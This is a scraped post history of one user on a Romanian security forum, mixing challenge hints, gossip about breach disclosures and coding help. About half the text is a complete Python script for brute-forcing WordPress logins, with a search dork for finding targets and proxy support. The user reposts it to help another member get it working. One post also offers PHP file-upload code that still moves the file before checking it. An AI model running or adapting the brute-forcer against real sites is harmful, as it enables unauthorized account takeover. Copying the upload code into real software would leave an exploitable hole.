![](https://rstforums.com/forum/uploads/set_resources_17/84c1e40ea0e759e3f1505eb1788ddf3c_pattern.png)
nedo
-
Posts
2065 -
Joined
-
Last visited
-
Days Won
11
Posts posted by nedo
-
-
Arata bine, cred ca ma inscriu si eu la beta testing
-
Presupun ca trebuie sa te muti in celalalt oras. "Statia centrala". Interesant joculetul. Felicitari Synthesis, iti meriti statusul("PHP Führer")
-
@ Zatarra: esa 17.04.2011, nasa 17.05.2011
On. dap, totusi e ciudat ca nu l-am mai vazut postand pe aici ....
-
Search inainte ... a mai fost postat <-- asta este pentru isprava mai noua.
Verificati blogul lui tinkode aici si vedeti de fapt de cant e treaba cu "esa". El a postat datele respective pe data de 17 aprilie.
-
07-25-2010, 02:05 PM Sunteti constienti ca asta e data ultimului post nu? Felicitari pentru reinvierea unui alt post mort.
-
havij, acunetix , scripturi in diferite limaje
-
A mai observat cineva ca aceste "disclosure"-uri sunt facute in zile ce se termina in 7? Adica 7, 17, 27... ? Ma refer la ultimele actiuni.
sunt 2 la rand pe 17, ultimele 2, si 2 la rand pe 27. Cine stie o fi vreo legatura
@petzy : probabil vrei sa spui de ce nu il angajeaza ca pentester. Firmele respective probabil au deja contracte cu alte firme pentru asa ceva. Nu o sa mai angajeze un om in plus.
on topic, s-a cam legat de cei cu explorarea spatiului in ultima vreme, probabil se incapataneaza sa tina acele vulnerabilitati deschise si de aia ii verifica.
-
Pentru un hint mai mare .
Nu trebuie sa te uiti in sursa acelui programel .
Te uiti la descriere sus cum se face criptarea / decriptarea
70 is expanded to 70 00
After the swap the result is: 07 00
XOR with A5: A2 A5
Deci "ca" ar fi
63 - 63 00 = > 36 00 = > 93 A5
61 - 61 00 = > 16 00 = > B3 A5
Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log
sper sa nu stric jocu
Cred ca asta este un hint destul de mare. Trebuie sa decriptezi utilizandu-te de asta.
-
Da am observat. Depinde de scriptul de lookup al fiecarui site. Unele din ele nu sunt foarte bune deci returneaza rezultate eronate sau nu returneaza nici un rezultat(pe unele asa am gasit).
-
pff, nu mai gasesc site-ul pe care am verificat eu. Ideea e ca pe ip-ul 74.125.224.148 care ti-l daca faci lookup pe google.com mai sunt hostate mai multe servicii. Tu trebuie sa gasesti unul din celelalte domenii.
incearca aici cu ip-ul pe care ti-l dau ei, la chalange-ul meu mie mi-a dat ip-ul 74.125.87.103
-
dnslookup pe google.com, mai multe indicii nu iti dau
-
^^ problema e ca DOAR SPUNE, nu face nimic in plus, si in plus multe chestii le exagereaza prea mult. A nu se considera ca tin cu Base, dupa parerea mea trebuie toti dati jos de acolo si pusi niste oameni responsabili. Sunt sigur ca in tara asta se gasesc 1000 de oameni responsabili si cu capul pe umeri sa poata sa faca ce trebuie pentru tara asta.
-
Intrebare tampita: Daca este pe domeniu .ro de ce site-ul este in germana(prima poza)?
-
scuze,wildchild, nu am citit bine intrebarea ta. ... Pe langa visual studio pentru c/c++ iti recomand code blocks, mult mai usor, mult mai prietenos si mult mai intuitiv.
-
Primul este scris in c, pentru windows, al 2-lea este scris in c++ pe linux.
-
chestia e ca ori
a: site-ul este inca in construcite ca vad ca sunt aiurea multe chestii
b: e facut foarte foarte prost, nu sunt ascunse directoarele, ai acces la scripturile js de pe site, la toate pozele, si probabil si la alte chestii dar nu am cautat.
-
acum am realizat ca scriptul este facut pe linux.
Verifica adresele de la importuri, sa fie corecte.
Cand ajung acasa incerc sa vad ce si cum.
-
ai 2 else-uri aiurea
else
{
redir('index.php?rs=ok');
}si
else
{
redir('index.php');
}in plus ai o "}" aiurea pusa,
incearca cu asta
<?php
include('utilities.php');
$folder="data/images/";
$foto=$folder.'file.txt';
if ($_FILES['foto']['tmp_name'])
{
move_uploaded_file($_FILES['foto']['tmp_name'], "$foto");
$allowedExtensions = array("txt","htm","html","xml");
if ($file['tmp_name'] > '')
{
if (!in_array(end(explode(".",
strtolower($file['name']))),
$allowedExtensions))
{
die($file['name'].' is an invalid file type!<br/>');
}
}
//mutam "}" de aici mai jos
if ( $type!= "txt")
{
$_SESSION['error']='<p>Eroare. Incercati din nou.</p>';
unlink($foto);
redir('index.php');
}
else
{
redir('index.php?rs=ok');
}
} // aici
else
{
redir('index.php');
}
?> -
Cqkiller does not work anymore. It is not maintained by anyone so you can't get any code or any program .
-
are ip de upc din ce vad eu pe whois. Deci s-ar putea sa fie static, daca e cu rooter.
-
Face cam ce face orice troian, iti permite sa furi datele de la un anumit utilizator. Probabil iti permite sa faci si remote desktop/console, chestii din astea.
Daca nu stii ce poate face un troian e mai bine sa te documentezi inainte sa umblii cu asa ceva pentru a nu te pune in pericol.
-
Multumim palcuiealex
imi place partea finala, nu cumva asta e ceea ce fac Cheater, pax si nytro?
Le: Perfect, deci 1 saptamana avem de asteptat sa vedem prezentarile
-
bf-ul este probabil luat de aici
codul bf-ului este urmatorul:
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)
#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)
#Dork: inurl:wp-login.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
print "\t -p/-proxy <host:port> : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
#Change this response if different. (language)
if re.search("<strong>ERROR</strong>",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"problema lui este in "urllib2.py".
-
hehe, eu nu am trecut inca de lvl 1
Trebuie sa gasesc ceva intr-un domeniu nasa.gov si eventual sa fac un xss sau ceva nu?
Le: am ajuns la lvl 8 si m-am blocat ... nu imi dau seama ce sa fac ...
BitDefender Total Security 2012 Beta
in Programe securitate
Posted
Corect. Cand am zis ca ma bag si eu la beta testing m-am referit la testarea lui in diverse conditii.(Diferite exploituri, diferiti virusi, diferite browsere, diferite situatii).